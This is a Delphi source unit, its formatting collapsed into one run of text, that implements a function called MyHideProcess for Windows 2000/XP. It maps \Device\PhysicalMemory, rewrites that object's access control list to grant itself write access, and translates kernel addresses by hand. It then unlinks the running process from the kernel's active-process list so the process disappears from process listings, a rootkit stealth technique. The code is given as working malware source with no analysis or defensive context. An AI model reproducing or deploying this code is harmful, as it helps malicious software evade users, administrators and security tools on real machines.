interfacefunction MyHideProcess: Boolean;implementationusesWindows,Classes, AclAPI, accCtrl;typeNTSTATUS = LongInt;const//NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);STATUS_ACCESS_DENIED = NTSTATUS($C0000022);OBJ_INHERIT = $00000002;OBJ_PERMANENT = $00000010;OBJ_EXCLUSIVE = $00000020;OBJ_CASE_INSENSITIVE = $00000040;OBJ_OPENIF = $00000080;OBJ_OPENLINK = $00000100;OBJ_KERNEL_HANDLE = $00000200;OBJ_VALID_ATTRIBUTES = $000003F2;typePIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;IO_STATUS_BLOCK = recordStatus: NTSTATUS;FObject: DWORD;end;PUNICODE_STRING = ^UNICODE_STRING;UNICODE_STRING = recordLength: Word;MaximumLength: Word;Buffer: PWideChar;end;POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;OBJECT_ATTRIBUTES = recordLength: DWORD;RootDirectory: Pointer;ObjectName: PUNICODE_STRING;Attributes: DWORD;SecurityDescriptor: Pointer;SecurityQualityOfService: Pointer;end;TZwOpenSection = function(SectionHandle: PHandle;DesiredAccess: ACCESS_MASK;ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;SourceString: PWideChar); stdcall;varRtlInitUnicodeString: TRTLINITUNICODESTRING = nil;ZwOpenSection: TZwOpenSection = nil;g_hNtDLL: THandle = 0;g_pMapPhysicalMemory: Pointer = nil;g_hMPM: THandle = 0;g_hMPM2: THandle = 0;g_osvi: OSVERSIONINFO;b_hide: Boolean = false;//---------------------------------------------------------------------------function InitNTDLL: Boolean;beging_hNtDLL := LoadLibrary('ntdll.dll');if 0 = g_hNtDLL thenbeginResult := false;Exit;end;RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');Result := True;end;//---------------------------------------------------------------------------procedure CloseNTDLL;beginif (0 <> g_hNtDLL) thenFreeLibrary(g_hNtDLL);g_hNtDLL := 0;end;//---------------------------------------------------------------------------procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);varpDacl: PACL;pSD: PPSECURITY_DESCRIPTOR;pNewDacl: PACL;dwRes: DWORD;ea: EXPLICIT_ACCESS;beginpDacl := nil;pSD := nil;pNewDacl := nil;dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);if ERROR_SUCCESS <> dwRes thenbeginif Assigned(pSD) thenLocalFree(Hlocal(pSD^));if Assigned(pNewDacl) thenLocalFree(HLocal(pNewDacl));end;ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));ea.grfAccessPermissions := SECTION_MAP_WRITE;ea.grfAccessMode := GRANT_ACCESS;ea.grfInheritance := NO_INHERITANCE;ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;ea.Trustee.TrusteeType := TRUSTEE_IS_USER;ea.Trustee.ptstrName := 'CURRENT_USER';dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);if ERROR_SUCCESS <> dwRes thenbeginif Assigned(pSD) thenLocalFree(Hlocal(pSD^));if Assigned(pNewDacl) thenLocalFree(HLocal(pNewDacl));end;dwRes := SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);if ERROR_SUCCESS <> dwRes thenbeginif Assigned(pSD) thenLocalFree(Hlocal(pSD^));if Assigned(pNewDacl) thenLocalFree(HLocal(pNewDacl));end;end;//---------------------------------------------------------------------------function OpenPhysicalMemory: THandle;varstatus: NTSTATUS;physmemString: UNICODE_STRING;attributes: OBJECT_ATTRIBUTES;PhyDirectory: DWORD;beging_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);GetVersionEx(g_osvi);if (5 <> g_osvi.dwMajorVersion) thenbeginResult := 0;Exit;end;case g_osvi.dwMinorVersion of0: PhyDirectory := $30000;1: PhyDirectory := $39000;elsebeginResult := 0;Exit;end;end;RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');attributes.Length := SizeOf(OBJECT_ATTRIBUTES);attributes.RootDirectory := nil;attributes.ObjectName := @physmemString;attributes.Attributes := 0;attributes.SecurityDescriptor := nil;attributes.SecurityQualityOfService := nil;status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);if (status = STATUS_ACCESS_DENIED) thenbeginZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);SetPhyscialMemorySectionCanBeWrited(g_hMPM);CloseHandle(g_hMPM);status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);end;if not (LongInt(status) >= 0) thenbeginResult := 0;Exit;end;g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);if (g_pMapPhysicalMemory = nil) thenbeginResult := 0;Exit;end;Result := g_hMPM;end;//---------------------------------------------------------------------------function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;varVAddr, PGDE, PTE, PAddr, tmp: DWORD;beginVAddr := DWORD(addr);// PGDE := BaseAddress[VAddr shr 22];PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // modify by dot.if 0 = (PGDE and 1) thenbeginResult := nil;Exit;end;tmp := PGDE and $00000080;if (0 <> tmp) thenbeginPAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);endelsebeginPGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));// PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // modify by dot.if (0 = (PTE and 1)) thenbeginResult := nil;Exit;end;PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);UnmapViewOfFile(Pointer(PGDE));end;Result := Pointer(PAddr);end;//---------------------------------------------------------------------------function GetData(addr: Pointer): DWORD;varphys, ret: DWORD;tmp: PDWORD;beginphys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,phys and $FFFFF000, $1000));if (nil = tmp) thenbeginResult := 0;Exit;end;// ret := tmp[(phys and $FFF) shr 2];ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // modify by dot.UnmapViewOfFile(tmp);Result := ret;end;function SetData(addr: Pointer; data: DWORD): Boolean;varphys: DWORD;tmp: PDWORD;beginphys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));if (nil = tmp) thenbeginResult := false;Exit;end;// tmp[(phys and $FFF) shr 2] := data;PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // modify by dot.UnmapViewOfFile(tmp);Result := TRUE;end;//---------------------------------------------------------------------------{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)beginExitProcess(0);return 1 ;end }//---------------------------------------------------------------------------function YHideProcess: Boolean;varthread, process: DWORD;fw, bw: DWORD;begin// SetUnhandledExceptionFilter(exeception);if (FALSE = InitNTDLL) thenbeginResult := FALSE;Exit;end;if (0 = OpenPhysicalMemory) thenbeginResult := FALSE;Exit;end;thread := GetData(Pointer($FFDFF124)); //ktebprocess := GetData(Pointer(thread + $44)); //kpebif (0 = g_osvi.dwMinorVersion) thenbeginfw := GetData(Pointer(process + $A0));bw := GetData(Pointer(process + $A4));SetData(Pointer(fw + 4), bw);SetData(Pointer(bw), fw);Result := TRUE;endelse if (1 = g_osvi.dwMinorVersion) thenbeginfw := GetData(Pointer(process + $88));bw := GetData(Pointer(process + $8C));SetData(Pointer(fw + 4), bw);SetData(Pointer(bw), fw);Result := TRUE;endelsebeginResult := False;end;CloseHandle(g_hMPM);CloseNTDLL;end;function MyHideProcess: Boolean;beginif not b_hide thenbeginb_hide := YHideProcess;end;Result := b_hide;end;end.
